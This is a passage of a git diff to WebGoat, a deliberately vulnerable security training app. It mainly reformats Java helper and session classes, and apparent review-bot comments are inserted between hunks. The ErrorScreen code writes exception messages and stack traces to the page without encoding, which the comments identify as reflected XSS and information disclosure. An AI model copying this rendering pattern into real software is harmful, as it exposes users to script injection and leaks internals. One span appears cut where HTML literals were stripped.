value + * Description of the Parameter + * @param size + * Description of the Parameter + * @return Description of the Return Value + */ - a.addElement(new U().addElement(text)); - - a.addAttribute("style", "cursor:hand"); - - return (a); - } - - - /** - * Description of the Method - * - * @param text Description of the Parameter - * @param name Description of the Parameter - * @param value Description of the Parameter - * @return Description of the Return Value - */ - - public static A makeLink(String text, String name, int value) - { - - return (makeLink(text, name, Integer.toString(value))); - } - - - /** - * Description of the Method - * - * @param text Description of 
the Parameter - * @param name Description of the Parameter - * @param value Description of the Parameter - * @return Description of the Return Value - */ - - public static A makeLink(String text, String name, boolean value) - { - - return (makeLink(text, name, new Boolean(value).toString())); - } - - - /** - * Description of the Method - * - * @param text Description of the Parameter - * @param clickAction Description of the Parameter - * @param type Description of the Parameter - * @return Description of the Return Value - */ - - public static Input makeOnClickInput(String text, String clickAction, - String type) - { - - Input b = new Input(); - - b.setType(type); - - b.setValue(text); - - b.setOnClick(clickAction); - - return (b); - } - - - /** - * Description of the Method - * - * @param labeltext Description of the Parameter - * @param value Description of the Parameter - * @param e Description of the Parameter - * @return Description of the Return Value - */ - - public static TR makeOption(String labeltext, String value, Element e) - { - - TD left = new TD().setAlign("left").setWidth("10%"); - - left.addElement(e); - - TD right = new TD().setAlign("right"); - - Label label = new Label().addElement(labeltext); - - right.addElement(label); - - TR row = new TR(); - - row.addElement(right); - - row.addElement(left); - - return (row); - } - - - /** - * Description of the Method - * - * @param label Description of the Parameter - * @param value Description of the Parameter - * @return Description of the Return Value - */ - - public static Option makeOption(String label, boolean value) - { - - Option option = new Option(label, new Boolean(value).toString()); - - option.setSelected(value); - - return option; - } - - - /** - * Description of the Method - * - * @param line Description of the Parameter - * @return Description of the Return Value - */ - - private static org.apache.ecs.html.Option makeOption(String line) - { - - StringTokenizer st = new 
StringTokenizer(line, "|"); - - org.apache.ecs.html.Option o = new org.apache.ecs.html.Option(); - - String token = ""; - - if (st.hasMoreTokens()) + public static TR makeField(String labeltext, String name, String value, int size) { - token = st.nextToken(); + Input field = new Input().setName(name).setValue(value).setSize(size).setMaxlength(size); - } + // double check in case someone means to make a * starred out password field - o.addElement(token); - - return (o); - } - - - /** - * Description of the Method - * - * @param name Description of the Parameter - * @param options Description of the Parameter - * @return Description of the Return Value - */ - - public static Element makePulldown(String name, List options) - { - - Select s = new Select(name); - - s.addElement(options.toArray(new String[options.size()])); - - return (s); - } - - - /** - * Description of the Method - * - * @param results Description of the Parameter - * @return Description of the Return Value - */ - - public static Element makePulldown(String name, String results) - { - - Select select = new Select(name); - - StringTokenizer st = new StringTokenizer(results, "\n"); - - if (!st.hasMoreTokens()) - { - - return (new StringElement("")); - } - - while (st.hasMoreTokens()) - { - - String line = st.nextToken(); - - select.addElement(makeOption(line)); - - } - - select.addElement("-------------------------"); - - return (select); - } - - - /** - * Description of the Method - * - * @param name Description of the Parameter - * @param list Description of the Parameter - * @param selected Description of the Parameter - * @param rowsShowing Description of the Parameter - * @return Description of the Return Value - */ - - public static Select makePulldown(String name, Object[] list, - String selected, int rowsShowing) - { - - Select select = new Select(name); - - for (int loop = 0; loop < list.length; loop++) - { - - String value = list[loop].toString(); - - org.apache.ecs.html.Option o = new 
org.apache.ecs.html.Option( - value, value, value); - - if (value.equals(selected)) - { - - o.setSelected(true); - - } - - select.addElement(o); - - } - - select.setSize(rowsShowing); - - return select; - } - - - /** - * Default size of 1 for rows showing in select box. - * - * @param diffNames Description of the Parameter - * @param select Description of the Parameter - * @param name Description of the Parameter - * @param options Description of the Parameter - * @param list Description of the Parameter - * @param selected Description of the Parameter - * @return Description of the Return Value - */ - - public static Element makeSelect(boolean diffNames, Select select, - String name, Vector

"); + ec.addElement("
"); - ec.addElement(new BR()); + ec.addElement(new BR()); - ec.addElement(new BR()); + ec.addElement(new BR()); - return (ec); - } + return (ec); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/session/Employee.java b/main/project/JavaSource/org/owasp/webgoat/session/Employee.java index fd297cfb1..f28e82541 100644 --- a/main/project/JavaSource/org/owasp/webgoat/session/Employee.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/Employee.java 
@@ -1,271 +1,241 @@ + package org.owasp.webgoat.session; import java.io.Serializable; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class Employee implements Serializable { - /** + /** * */ private static final long serialVersionUID = -1901957360367218399L; public final static String EMPLOYEE_ROLE = "employee"; - public final static String MANAGER_ROLE = "manager"; + public final static String MANAGER_ROLE = "manager"; - public final static String HR_ROLE = "hr"; + public final static String HR_ROLE = "hr"; - private int id; + private int id; - private String firstName; + private String firstName; - private String lastName; + private String lastName; - private String title; + private String title; - private String ssn; + private String ssn; - private String phone; + private String phone; - private String address1; + private String address1; - private String address2; + private String address2; - private int manager; + private int manager; - private String startDate; + private String startDate; - private int salary; + private int salary; - private String ccn; + private String ccn; - private int ccnLimit; + private int ccnLimit; - private String disciplinaryActionDate; + private String disciplinaryActionDate; - private String disciplinaryActionNotes; + private String disciplinaryActionNotes; - private String personalDescription; + private String personalDescription; + // FIXME: To be deleted + public Employee() + { + } - // FIXME: To be deleted - public Employee() - {} + public Employee(int id, String firstName, String lastName, String ssn, String title, String 
phone, String address1, + String address2, int manager, String startDate, int salary, String ccn, int ccnLimit, + String disciplinaryActionDate, String disciplinaryActionNotes, String personalDescription) + { + this.id = id; + this.firstName = firstName; + this.lastName = lastName; + this.ssn = ssn; + this.title = title; + this.phone = phone; + this.address1 = address1; + this.address2 = address2; + this.manager = manager; + this.startDate = startDate; + this.salary = salary; + this.ccn = ccn; + this.ccnLimit = ccnLimit; + this.disciplinaryActionDate = disciplinaryActionDate; + this.disciplinaryActionNotes = disciplinaryActionNotes; + this.personalDescription = personalDescription; + } - - public Employee(int id, String firstName, String lastName, String ssn, - String title, String phone, String address1, String address2, - int manager, String startDate, int salary, String ccn, - int ccnLimit, String disciplinaryActionDate, - String disciplinaryActionNotes, String personalDescription) - { - this.id = id; - this.firstName = firstName; - this.lastName = lastName; - this.ssn = ssn; - this.title = title; - this.phone = phone; - this.address1 = address1; - this.address2 = address2; - this.manager = manager; - this.startDate = startDate; - this.salary = salary; - this.ccn = ccn; - this.ccnLimit = ccnLimit; - this.disciplinaryActionDate = disciplinaryActionDate; - this.disciplinaryActionNotes = disciplinaryActionNotes; - this.personalDescription = personalDescription; - } - - - public String getAddress1() - { - return address1; - } - - - public void setAddress1(String address1) - { - this.address1 = address1; - } - - - public String getAddress2() - { - return address2; - } - - - public void setAddress2(String address2) - { - this.address2 = address2; - } - - - public String getCcn() - { - return ccn; - } - - - public void setCcn(String ccn) - { - this.ccn = ccn; - } - - - public int getCcnLimit() - { - return ccnLimit; - } - - - public void setCcnLimit(int ccnLimit) - { - 
this.ccnLimit = ccnLimit; - } - - - public String getFirstName() - { - return firstName; - } - - - public void setFirstName(String firstName) - { - this.firstName = firstName; - } - - - public String getLastName() - { - return lastName; - } - - - public void setLastName(String lastName) - { - this.lastName = lastName; - } - - - public String getPhoneNumber() - { - return phone; - } - - - public void setPhoneNumber(String phone) - { - this.phone = phone; - } - - - public int getSalary() - { - return salary; - } - - - public void setSalary(int salary) - { - this.salary = salary; - } - - - public String getSsn() - { - return ssn; - } - - - public void setSsn(String ssn) - { - this.ssn = ssn; - } - - - public String getStartDate() - { - return startDate; - } - - - public void setStartDate(String startDate) - { - this.startDate = startDate; - } - - - public int getId() - { - return id; - } - - - public void setId(int id) - { - this.id = id; - } - - - public String getTitle() - { - return this.title; - } - - - public int getManager() - { - return this.manager; - } - - - public String getDisciplinaryActionDate() - { - return this.disciplinaryActionDate; - } - - - public String getDisciplinaryActionNotes() - { - return this.disciplinaryActionNotes; - } - - - public String getPersonalDescription() - { - return this.personalDescription; - } + public String getAddress1() + { + return address1; + } + + public void setAddress1(String address1) + { + this.address1 = address1; + } + + public String getAddress2() + { + return address2; + } + + public void setAddress2(String address2) + { + this.address2 = address2; + } + + public String getCcn() + { + return ccn; + } + + public void setCcn(String ccn) + { + this.ccn = ccn; + } + + public int getCcnLimit() + { + return ccnLimit; + } + + public void setCcnLimit(int ccnLimit) + { + this.ccnLimit = ccnLimit; + } + + public String getFirstName() + { + return firstName; + } + + public void setFirstName(String firstName) + { + 
this.firstName = firstName; + } + + public String getLastName() + { + return lastName; + } + + public void setLastName(String lastName) + { + this.lastName = lastName; + } + + public String getPhoneNumber() + { + return phone; + } + + public void setPhoneNumber(String phone) + { + this.phone = phone; + } + + public int getSalary() + { + return salary; + } + + public void setSalary(int salary) + { + this.salary = salary; + } + + public String getSsn() + { + return ssn; + } + + public void setSsn(String ssn) + { + this.ssn = ssn; + } + + public String getStartDate() + { + return startDate; + } + + public void setStartDate(String startDate) + { + this.startDate = startDate; + } + + public int getId() + { + return id; + } + + public void setId(int id) + { + this.id = id; + } + + public String getTitle() + { + return this.title; + } + + public int getManager() + { + return this.manager; + } + + public String getDisciplinaryActionDate() + { + return this.disciplinaryActionDate; + } + + public String getDisciplinaryActionNotes() + { + return this.disciplinaryActionNotes; + } + + public String getPersonalDescription() + { + return this.personalDescription; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/session/EmployeeStub.java b/main/project/JavaSource/org/owasp/webgoat/session/EmployeeStub.java index 459f109b6..d74c994f5 100644 --- a/main/project/JavaSource/org/owasp/webgoat/session/EmployeeStub.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/EmployeeStub.java 
@@ -1,88 +1,82 @@ + package org.owasp.webgoat.session; import java.io.Serializable; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class EmployeeStub implements Serializable { - /** + /** * */ private static final long serialVersionUID = -7109162877797765632L; private int id; - private String firstName; + private String firstName; - private String lastName; + private String lastName; - private String role; + private String role; + public EmployeeStub(int id, String firstName, String lastName) + { + this(id, firstName, lastName, Employee.EMPLOYEE_ROLE); + } - public EmployeeStub(int id, String firstName, String lastName) - { - this(id, firstName, lastName, Employee.EMPLOYEE_ROLE); - } + public EmployeeStub(int id, String firstName, String lastName, String role) + { + this.id = id; + this.firstName = firstName; + this.lastName = lastName; + this.role = role; + } + public String getFirstName() + { + return firstName; + } - public EmployeeStub(int id, String firstName, String lastName, String role) - { - this.id = id; - this.firstName = firstName; - this.lastName = lastName; - this.role = role; - } + public int getId() + { + return id; + } + public String getLastName() + { + return lastName; + } - public String getFirstName() - { - return firstName; - } - - - public int getId() - { - return id; - } - - - public String getLastName() - { - return lastName; - } - - - public String getRole() - { - return role; - } + public String getRole() + { + return role; + } } 
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/ErrorScreen.java b/main/project/JavaSource/org/owasp/webgoat/session/ErrorScreen.java index 5aa734794..4691d286d 100644 --- a/main/project/JavaSource/org/owasp/webgoat/session/ErrorScreen.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/ErrorScreen.java @@ -1,12 +1,11 @@ + package org.owasp.webgoat.session; import java.io.ByteArrayOutputStream; import java.io.PrintWriter; import java.util.StringTokenizer; import javax.servlet.ServletException; - import org.owasp.webgoat.lessons.AbstractLesson; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.HtmlColor; 
@@ -20,201 +19,194 @@ import org.apache.ecs.html.TR; import org.apache.ecs.html.Table; -/******************************************************************************* +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Jeff Williams Aspect Security - * @created November 4, 2003 + * + * @author Jeff Williams Aspect Security + * @created November 4, 2003 */ public class ErrorScreen extends Screen { /** - * Description of the Field + * Description of the Field */ protected Throwable error; /** - * Description of the Field + * Description of the Field */ protected String message; - - /** - * Constructor for the ErrorScreen object - * - * @param s Description of the Parameter - * @param t Description of the Parameter + * Constructor for the ErrorScreen object + * + * @param s + * Description of the Parameter + * @param t + * Description of the Parameter */ - public ErrorScreen( WebSession s, Throwable t ) + public ErrorScreen(WebSession s, Throwable t) { this.error = t; - fixCurrentScreen( s ); - setup( s ); + fixCurrentScreen(s); + setup(s); } - /** - * Constructor for the ErrorScreen object - * - * @param s Description of the Parameter - * @param msg Description of the Parameter + * Constructor for the ErrorScreen object + * + * @param s + * Description of the Parameter + * @param msg + * Description of the Parameter */ - public ErrorScreen( WebSession s, String msg ) + public ErrorScreen(WebSession s, String msg) { this.message = msg; - fixCurrentScreen( s ); - setup( s ); + fixCurrentScreen(s); + setup(s); } - - public void fixCurrentScreen( WebSession s ) + public void fixCurrentScreen(WebSession s) { // So the user can't get stuck on the 
error screen, reset the // current screen to something known - if ( s!= null ) - { - try + if (s != null) + { + try { - s.setCurrentScreen( s.getCourse().getFirstLesson().getScreenId() ); - } - catch ( Throwable t ) + s.setCurrentScreen(s.getCourse().getFirstLesson().getScreenId()); + } catch (Throwable t) { - s.setCurrentScreen( WebSession.WELCOME ); + s.setCurrentScreen(WebSession.WELCOME); } } } - - public void setup( WebSession s ) + public void setup(WebSession s) { // call createContent first so messages will go somewhere - Form form = new Form( "attack", Form.POST ).setName( "form" ).setEncType( "" ); + Form form = new Form("attack", Form.POST).setName("form").setEncType(""); - form.addElement( wrapForm( s ) ); + form.addElement(wrapForm(s)); - TD lowerright = new TD().setHeight( "100%" ).setVAlign( "top" ).setAlign( "left" ).addElement( form ); - TR row = new TR().addElement( lowerright ); - Table layout = new Table().setBgColor( HtmlColor.WHITE ).setCellSpacing( 0 ).setCellPadding( 0 ).setBorder( 0 ); + TD lowerright = new TD().setHeight("100%").setVAlign("top").setAlign("left").addElement(form); + TR row = new TR().addElement(lowerright); + Table layout = new Table().setBgColor(HtmlColor.WHITE).setCellSpacing(0).setCellPadding(0).setBorder(0); - layout.addElement( row ); - - setContent(layout); + layout.addElement(row); + + setContent(layout); } - protected Element wrapForm( WebSession s ) + protected Element wrapForm(WebSession s) { - if ( s == null ) - { - return new StringElement( "Invalid Session" ); - } + if (s == null) { return new StringElement("Invalid Session"); } + + Table container = new Table().setWidth("100%").setCellSpacing(10).setCellPadding(0).setBorder(0); - Table container = new Table().setWidth( "100%" ).setCellSpacing( 10 ).setCellPadding( 0 ).setBorder( 0 ); - // CreateContent can generate error messages so you MUST call it before makeMessages() - Element content = createContent( s ); - container.addElement( new TR().addElement( new 
TD().setColSpan( 2 ).setVAlign( "TOP" ).addElement( - makeMessages( s ) ) ) ); - container.addElement( new TR().addElement( new TD().setColSpan( 2 ).addElement( content ) ) ); - container.addElement( new TR() ); + Element content = createContent(s); + container.addElement(new TR().addElement(new TD().setColSpan(2).setVAlign("TOP").addElement(makeMessages(s)))); + container.addElement(new TR().addElement(new TD().setColSpan(2).addElement(content))); + container.addElement(new TR()); - return ( container ); + return (container); } /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value */ - protected Element createContent( WebSession s ) + protected Element createContent(WebSession s) { - System.out.println( "errorscreen createContent Error:" + this.error + " message:" + this.message ); + System.out.println("errorscreen createContent Error:" + this.error + " message:" + this.message); Element content; - if ( this.error != null ) + if (this.error != null) { - content = createContent( this.error ); + content = createContent(this.error); } - else if ( this.message != null ) + else if (this.message != null) { - content = createContent( this.message ); + content = createContent(this.message); } else { - content = new StringElement( "An unknown error occurred." 
); + content = new StringElement("An unknown error occurred."); } return content; } - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value */ - protected Element createContent( String s ) + protected Element createContent(String s) { - StringElement list = new StringElement( s ); + StringElement list = new StringElement(s); - return ( list ); + return (list); } - /** - * Description of the Method - * - * @param t Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param t + * Description of the Parameter + * @return Description of the Return Value */ - protected Element createContent( Throwable t ) + protected Element createContent(Throwable t) { StringElement list = new StringElement(); - list.addElement( new H2().addElement( new StringElement( "Error Message: " + t.getMessage() ) ) ); - list.addElement( formatStackTrace( t ) ); + list.addElement(new H2().addElement(new StringElement("Error Message: " + t.getMessage()))); + list.addElement(formatStackTrace(t)); - if ( t instanceof ServletException ) + if (t instanceof ServletException) { - Throwable root = ( (ServletException) t ).getRootCause(); + Throwable root = ((ServletException) t).getRootCause(); - if ( root != null ) + if (root != null) { - list.addElement( new H2().addElement( new StringElement( "Root Message: " + root.getMessage() ) ) ); - list.addElement( formatStackTrace( root ) ); + list.addElement(new H2().addElement(new StringElement("Root Message: " + root.getMessage()))); + list.addElement(formatStackTrace(root)); } } - return ( new Small().addElement( list ) ); + return (new Small().addElement(list)); } public Element getCredits() 
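Review bot: The new `createContent(Throwable t)` and `createContent(String s)` write `t.getMessage()`, `root.getMessage()` and the raw `message` string into the page through `StringElement` with no HTML encoding, and exception messages routinely echo request input (e.g. a `NumberFormatException` quotes the offending parameter), so a parameter that triggers an exception is reflected unescaped on the error screen. Unless ECS output filtering is enabled somewhere not visible here, that is a reflected-XSS sink; the error text should go through an HTML encoder before it is wrapped, or at least carry a comment stating the exposure is deliberate lesson material, e.g. `// NOTE: error text is emitted unescaped on purpose (WebGoat training app); do not reuse outside a lab`. The `System.out.println("errorscreen createContent Error:" ...)` line is debugging output to stdout rather than a logger and should be removed or downgraded. The enclosing class continues past the end of this hunk.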
@@ -222,57 +214,56 @@ public class ErrorScreen extends Screen return new ElementContainer(); } - /** - * Description of the Method - * - * @param t Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param t + * Description of the Parameter + * @return Description of the Return Value */ - public static Element formatStackTrace( Throwable t ) + public static Element formatStackTrace(Throwable t) { - String trace = getStackTrace( t ); + String trace = getStackTrace(t); StringElement list = new StringElement(); - StringTokenizer st = new StringTokenizer( trace, "\r\n\t" ); + StringTokenizer st = new StringTokenizer(trace, "\r\n\t"); - while ( st.hasMoreTokens() ) + while (st.hasMoreTokens()) { String line = st.nextToken(); - list.addElement( new Div( line ) ); + list.addElement(new Div(line)); } - return ( list ); + return (list); } - /** - * Gets the stackTrace attribute of the ErrorScreen class - * - * @param t Description of the Parameter - * @return The stackTrace value + * Gets the stackTrace attribute of the ErrorScreen class + * + * @param t + * Description of the Parameter + * @return The stackTrace value */ - public static String getStackTrace( Throwable t ) + public static String getStackTrace(Throwable t) { ByteArrayOutputStream bytes = new ByteArrayOutputStream(); - PrintWriter writer = new PrintWriter( bytes, true ); - t.printStackTrace( writer ); + PrintWriter writer = new PrintWriter(bytes, true); + t.printStackTrace(writer); - return ( bytes.toString() ); + return (bytes.toString()); } - /** - * Gets the title attribute of the ErrorScreen object - * - * @return The title value + * Gets the title attribute of the ErrorScreen object + * + * @return The title value */ public String getTitle() { - return ( "Error" ); + return ("Error"); } - - public String getRole() { + + public String getRole() + { return AbstractLesson.USER_ROLE; } } - 
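Review bot: `getStackTrace` round-trips the trace through a `ByteArrayOutputStream` and `bytes.toString()`, which encodes and decodes with the platform default charset and can mangle non-ASCII characters in exception messages; a `StringWriter` avoids the byte conversion entirely: `StringWriter sw = new StringWriter(); t.printStackTrace(new PrintWriter(sw, true)); return sw.toString();`. `formatStackTrace` then places each raw trace line in a `Div` without encoding, and the full trace (class names, line numbers, container internals) is shipped to the browser, which is classic information disclosure; since this is a WebGoat screen that may be intentional, but a one-line comment saying so would stop the pattern being copied, e.g. `// Stack trace is rendered to the user on purpose for this training app.` The `PrintWriter` is never closed or flushed explicitly; autoflush on `println` covers `printStackTrace` here, but a try-with-resources would make that obvious.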
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/LessonSession.java b/main/project/JavaSource/org/owasp/webgoat/session/LessonSession.java
index edc1b16f6..5a8afc1f9 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/LessonSession.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/LessonSession.java
@@ -1,36 +1,34 @@ + package org.owasp.webgoat.session; -/******************************************************************************* +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. 
* * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * Represents a virtual session for a lesson. Lesson-specific session data may - * be stored here. + * + * Represents a virtual session for a lesson. Lesson-specific session data may be stored here. * * @author David Anderson Aspect Security * @created January 19, 2006 @@ -38,32 +36,28 @@ package org.owasp.webgoat.session; public class LessonSession { - private boolean isAuthenticated = false; + private boolean isAuthenticated = false; - private String currentLessonScreen; + private String currentLessonScreen; + public void setAuthenticated(boolean isAuthenticated) + { + this.isAuthenticated = isAuthenticated; + } - public void setAuthenticated(boolean isAuthenticated) - { - this.isAuthenticated = isAuthenticated; - } + public boolean isAuthenticated() + { + return this.isAuthenticated; + } + public void setCurrentLessonScreen(String currentLessonScreen) + { + this.currentLessonScreen = currentLessonScreen; + } - public boolean isAuthenticated() - { - return this.isAuthenticated; - } - - - public void setCurrentLessonScreen(String currentLessonScreen) - { - this.currentLessonScreen = currentLessonScreen; - } - - - public String getCurrentLessonScreen() - { - return this.currentLessonScreen; - } + public String getCurrentLessonScreen() + { + return this.currentLessonScreen; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/session/LessonTracker.java b/main/project/JavaSource/org/owasp/webgoat/session/LessonTracker.java index bfb8bcfbf..dcc323d4c 100644 --- a/main/project/JavaSource/org/owasp/webgoat/session/LessonTracker.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/LessonTracker.java 
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.session;
 
 import java.io.FileInputStream;
@@ -5,441 +6,399 @@ import java.io.FileNotFoundException; import java.io.FileOutputStream; import java.util.Properties; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Bruce Mayhew WebGoat - * @created October 29, 2003 + * + * @author Bruce Mayhew WebGoat + * @created October 29, 2003 */ public class LessonTracker { - private boolean completed = false; + private boolean completed = false; - private int maxHintLevel = 0; + private int maxHintLevel = 0; - private int numVisits = 0; + private int numVisits = 0; - private boolean viewedCookies = false; + private boolean viewedCookies = false; - private boolean viewedHtml = false; + private boolean viewedHtml = false; - private boolean viewedLessonPlan = false; + private boolean viewedLessonPlan = false; - private boolean viewedParameters = false; + private boolean viewedParameters = false; - private boolean viewedSource = false; + private boolean viewedSource = false; - private boolean viewedSolution = false; + private boolean viewedSolution = false; - Properties lessonProperties = new Properties(); + Properties lessonProperties = new Properties(); - - /** - * Gets the completed attribute of the LessonTracker object - * - * @return The completed value - */ - public boolean getCompleted() - { - return completed; - } - - - /** - * Gets the maxHintLevel attribute of the LessonTracker object - * - * @return The maxHintLevel value - */ - public int getMaxHintLevel() - { - return maxHintLevel; - } - - - /** - * Gets the numVisits attribute of the LessonTracker object - * - * @return The numVisits value - */ - public int getNumVisits() - { - return 
